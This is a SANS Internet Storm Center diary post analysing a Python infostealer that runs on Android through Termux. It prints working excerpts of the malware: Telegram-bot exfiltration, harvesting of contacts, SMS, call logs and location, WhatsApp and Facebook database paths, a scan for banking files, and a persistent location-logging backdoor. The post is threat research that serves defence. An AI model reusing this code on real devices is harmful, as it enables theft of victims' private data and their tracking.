Home Intel Hub T01 - SANS Internet Storm Center, InfoCON: green Infostealer Targeting Android Devices, (Thu, Oct 23rd)

Infostealer Targeting Android Devices, (Thu, Oct 23rd)

SANS Internet Storm Center, InfoCON: green 2025-10-23

Infostealers landscape exploded in 2024 and they remain a top threat today. If Windows remains a nice target (read: Attackers' favorite), I spotted an Infostealer targeting Android devices. This sounds logical that attackers pay attention to our beloved mobile devices because all our life is stored on them.

The sample that I found (SHA256: 7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182) received a VT score of 0/64[1]! Undetected! The source code contains comments in Vietnamese. The sample is a Python script. How can you execute Python code on an Android device? Say hello to Termux, your new best friend.

From the documentation: "Termux[2] is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager."

Sounds great to run Python code.

Once Termux is installed, add the Python package:

$ pkg install python

The infostealer is classic and exfiltrate data through a Telegram channel:

def send_telegram(msg):    try:        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"        data = {"chat_id": CHAT_ID, "text": msg}        requests.post(url, data=data, timeout=10)    except: pass

But, how can the malware access Android data? Termux comes with a suite a command-line tools that provide juicy information. For example, termux-contact-list[3] returns a list of contacts stored in the phone in JSON:

[  {    "id": 1,    "name": "Alice Dupont",    "phone_numbers": [      "+32470123456",      "+3221234567"    ],    "emails": [      "alice.dupont@example.com"    ]  },  {    "id": 2,    "name": "Bob Martin",    "phone_numbers": [      "+32475123456"    ],    "emails": []  },  {    "id": 3,    "name": "Caroline Smith",    "phone_numbers": [],    "emails": [      "caroline.smith@company.com",      "c.smith@gmail.com"    ]  }]

The infostealer will collect and exfiltrate the following information:

contacts = subprocess.getoutput('termux-contact-list')sms = subprocess.getoutput('termux-sms-list')call_log = subprocess.getoutput('termux-call-log')location = subprocess.getoutput('termux-location')

The malware tries also to exfiltrate data from apps like Facebook and Whatsapp. How? In the Android ecosystem, Termux is running in a sandbox and has access only to its own $HOME directory:

/data/data/com.termux/files/home

But another tools is provided: termux-setup-storage. That one will allow access to the phone storage through a mapping lile:

/storage/emulated/0/<dir>

Note that the victim will be prompted with a dialog prompt asking right to access data. But they’ll do right?

The malware will try to exfiltrate more data:

fb_paths = [    '/storage/emulated/0/Android/data/com.facebook.katana/',    '/storage/emulated/0/Facebook/']wa_paths = [    '/storage/emulated/0/WhatsApp/Databases/msgstore.db',    '/storage/emulated/0/WhatsApp/Databases/wa.db',    '/sdcard/WhatsApp/Databases/msgstore.db']media_paths = [    '/storage/emulated/0/DCIM/',    '/storage/emulated/0/Pictures/',    '/storage/emulated/0/Movies/',    '/storage/emulated/0/Download/']

It will also search for banking related information:

banking_files = []    for root, dirs, files in os.walk('/storage/emulated/0/'):        for file in files:            if any(keyword in file.lower() for keyword in ['bank', 'atm', 'vietcombank', 'vpbank', 'mbbank', 'acb']):                banking_files.append(os.path.join(root, file))

 Get device info:

device_model = subprocess.getoutput('getprop ro.product.model')android_version = subprocess.getoutput('getprop ro.build.version.release')device_name = subprocess.getoutput('getprop ro.product.device')

A backdoor will be installed:

def install_backdoor():    try:        backdoor_script = '''import os, time, requestswhile True:    try:        os.system("termux-location > /data/data/com.termux/files/home/location.txt")        time.sleep(300)    except:        time.sleep(60)'''        with open('/data/data/com.termux/files/home/backdoor.py', 'w') as f:            f.write(backdoor_script)            os.system('python3 /data/data/com.termux/files/home/backdoor.py &')        except: pass

I just found the infostealer and I don’t know the complete infection path. How was Termux installed? Is it a PoC? But, for sure, Android devices can also be targeted!

[1] https://www.virustotal.com/gui/file/7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182 [2] https://termux.dev/en/ [3] https://wiki.termux.com/wiki/Termux-contact-list

Xavier Mertens (@xme) Xameco Senior ISC Handler - Freelance Cyber Security Consultant PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.